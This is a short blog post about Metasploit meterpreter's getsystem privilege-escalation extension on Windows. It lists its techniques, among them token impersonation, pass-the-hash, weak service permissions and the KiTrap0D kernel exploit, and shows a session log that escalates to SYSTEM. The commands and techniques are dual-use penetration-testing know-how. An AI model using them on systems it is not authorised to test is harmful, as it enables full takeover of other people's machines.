A few weeks ago Chris Gates (ala Attack Research/Carnal Ownage) and Joshua Gauthier showed some quick snippets of Metasploit‘s Getsystem extension. Getsystem is meterpreter’s new (windows) privilege escalation extension used in the priv module.
Getsystem uses several techniques for priv escalation:
- Windows Impersonation Tokens (fixed by MS09-012)
- Abusing LSASS via token passing (Pass-the-Hash) which requires Administrator anyway.
- Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM, if you are lucky they run as a domain administrator).
- Improved KiTrap0D exploit released by Tavis Ormandy ( MS10-015 patched as of now)
As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension which i will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.
And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):
meterpreter > use priv
Loading extension priv…success.
meterpreter > getsystem -h
Usage: getsystem [options] Attempt to elevate your privilege to that of local system.
-h Help Banner.
-t The technique to use. (Default to ‘0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM